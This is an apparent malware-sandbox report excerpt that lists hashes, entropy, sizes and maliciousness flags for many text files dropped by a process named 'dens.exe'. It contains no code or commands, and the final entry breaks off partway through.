                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                            MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                            SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                            SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                            SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
